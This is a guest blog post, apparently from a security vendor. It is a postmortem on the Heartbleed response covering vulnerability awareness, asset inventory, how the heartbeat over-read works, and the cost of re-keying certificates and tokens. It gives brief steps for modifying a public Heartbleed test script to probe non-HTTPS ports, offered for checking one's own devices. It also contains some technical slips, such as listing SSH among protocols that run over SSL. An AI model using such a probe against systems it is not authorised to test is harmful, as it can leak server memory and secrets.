Skip to content ↓ | Skip to navigation ↓

Last week was Heartbleed week. It was what experts call the biggest security lapse in the last few years, and both the mainstream and industry press have spent a lot of time explaining what this is and how it could be fixed. You would expect that everything on the subject has been said by now, as the fix is known and already applied in many cases.

It was just a bothersome bug, but we can get back to business as usual. Right? No. The Heartbleed bug reveals a lot about how we deal with these kinds of crises.

With all the efforts put into structuring security over the last years, the process should have been established by now. We will be exploring the handling of the crisis in this postmortem to see what went right and where we need to improve.

The recovery operation applied for the Heartbleed bug has not been extremely pragmatic, or to say, it looks a lot like chaotically applied emergency bandages. If this process is not going to improve, next time we will be in the same situation again. And furthermore, this crisis is far from over.


The news of the Heartbleed bug came at us through the mainstream press, the security press, through Twitter and from all sides. That was very nice. Why did it happen like this? Because it was a critical gap in a product used on a massive scale; two-thirds of all Internet-enabled devices are said to use OpenSSL. Similar gaps also occur in less commonly used software. Indeed, there are almost no products in use as widely as OpenSSL.

If your organization depends on the mainstream media for security alerts, you will miss nearly all critical defects in any software less important than something like OpenSSL. or Slate magazine normally pay no attention to software bugs.  It is very likely that your organization has more than the most commonly used software out there, so if there is a super critical bug in it now would you know of it? The answer is almost certainly negative.

It is somewhat of a coincidence that this bug has drawn so much attention. The very critical Pass The Hash attack discovered in 2013 affected almost certainly a larger part of the world than Heartbleed – since it affected all networks with Microsoft products.

But the mainstream press did not run the story – and if your business is depending on information drawn from the mainstream press, your organization missed it too.


How quick did we know the full impact of Heartbleed when the news arrived? Have we established the full impact already? How could you figure out on what machines the faulty software is running on?

OpenSSL has been tucked away in many products deep under the hood, even in products where you least expect it. OpenSSL is sometimes even embedded in hardware. Now, there is the well-known test tool ( but this test only tests for Heartbleed on websites. O

penSSL is not only embedded in websites, but in many other products such as VPNs, directories, mail servers, and many more. So how do you know if you’re vulnerable to Heartbleed bug, and even more important how would you know when the crisis has subsided?

Of course you can wait until the vendor reports something. A survey of some major suppliers makes it clear that you must be following the staff blog to pick up on this. At other companies you need to check the security advisories, while some vendors have nothing to offer or ask for patience while they find a solution.

There are no standards for this type of disclosure, so it is not easy to make a proper inventory. Moreover, you should know exactly what you have in-house and which suppliers you have to look for to fix a certain bug.

Another approach would be to start testing yourself. The test tool mentioned above is only suitable for websites, but that does not mean that it is difficult to test other systems. Indeed, it is possible to test them.

The Heartbleed bug is an error in a specific SSL function. This function, known as the the heartbeat function, has been proposed and written about by Dr. Seggelmann and is intended to maintain an SSL session when the underlying protocol cannot maintain it. Instead of ending and restarting an SSL session, the client sends out a heartbeat call which keeps the SSL session open so that no new ‘expensive’ SSL session needs to be started.

The bug which Heartbleed abuses is in the implementation of the heartbeat response. In order to carry out the heartbeat call, a user must send a series of bytes and specify the length of the series of bytes. OpenSSL stores this information, then sends the bytes back and the session continues.

In an attack scenario it goes as follows: Instead of indicating how many bytes it sends, it claims a larger number of bytes than was actually sent. In that case, OpenSSL retrieves more bytes from the memory than was sent and returns this along with potentially sensitive information. That’s all there is to it.

Because the problem is in the software that creates and maintains SSL session, protocols that operate on top of SSL such as FTPS, SSH, SSL-POP3, SCEP, etc, are all compromised. SSL is a protocol that acts on the layer below HTTP, and must therefore be tested on that layer. Mail servers, for example, which only handle POP3, will probably not be tested right now, but may very well be equally vulnerable.

It is not so difficult to adapt the Heartbleed test to other types of servers. You can follow the next steps to test machines other than http machines:

1:  Download the following project:
2:  Add the following at the command line options (somewhere between lines 35-46):
options.add_option (‘- port’, ‘-p’, dest = “port”, default = 443, help = “ check port, useful for scanning non https servers)
3: Next, search the document for the text ‘443 ‘. There are two hits, the first is in the line that has just been added, the second a bit further in the script
4: Replace the 2nd hit: s.connect((host, 443)) to s.connect((host, opts.port))

From that point you can use the -p option to test a non-http port. This way you can single handedly determine if a device is vulnerable. Which brings us to the last question…

Decide and Act

Are you responding properly? Are all vulnerable components being found and patched, all potentially sensitive materials replaced and all users and customers sufficiently informed? According to most suppliers, you need to replace all certificates, passwords and the like.

The American and the Dutch governments agree with the suppliers; replace everything.

In practice, very few organizations replace their certificates like Netstat did on April the 11th. That means most of the organizations have not implemented the advice to replace all (yet). A good reason may be that the certificate revocation system of CRL and OCSP is not able to handle such massive numbers of revocations.

What ‘everything’ means is also far from clear. For example, if you look at token suppliers, you can see that many strong authentication products may have been affected by the products they cooperate with, such as the well-known login tokens used by banks and software tokens installed on phones. A good explanation of how they work and what the solution might look like for the OTP can be read here.

It is exactly as the suppliers of hardware tokens report, whether ( or not ( they do so prominently, the tokens need new keying materials. This means a huge logistical operation is required to re-initialize or replace hardware tokens.

Every customer should therefore request new hardware tokens from the banks. Ouch. Would they really do this?

In practice it is really difficult to replace these tokens. It is understandable that organizations have doubt about what to do, given the cost and potential impact. After all, we do not know whether any information has been leaked, and we may never know.

It is such a large and costly operation to replace everything that may have been compromised. With such a large operation ​​big mistakes can also be made, as Akamai found out. Let’s chalk that up to acting before completely thinking it through.

There is much appeal in ignoring this entire situation as much as possible. The disadvantage of blissful ignorance is that you will not learn from Heartbleed. Carrying on and learning is vital because the Heartbleed crisis is not over yet. Even worse, it is just a taste of crises that are certain to come.


About the Authors:

Bram van Pelt is a technical security consultant at Traxion consultancy. In the last 4 years Bram has been involved with several large scale security projects.  As a technical subject matter expert Bram has also given talks and written papers on both Identity & Access management and penetration testing.

Peter Rietveld is an authority in the field of Computer and Information Security, with near to twenty years’ experience as a system architect, developer, penetration tester and cryptanalist. As a security advisor at Traxion he consults organizations in ICT, the aviation industry, telecom, finance, government agencies and health care. His forward-looking publication on the future of access control is online available under the Dutch title ‘Toekomst van de Toegang’. Currently he’s working on a thought-provoking new book on cyber-doctrines.  For years, he’s been a regular contributor to with timely and insightful commentary on issues in IT security.

Editor’s Note: The opinions expressed in this and other guest author articles are solely those of the contributor, and do not necessarily reflect those of Tripwire, Inc.


Related Articles:



picThe Executive’s Guide to the Top 20 Critical Security Controls

Tripwire has compiled an e-book, titled The Executive’s Guide to the Top 20 Critical Security Controls: Key Takeaways and Improvement Opportunities, which is available for download [registration form required].


Title image courtesy of ShutterStock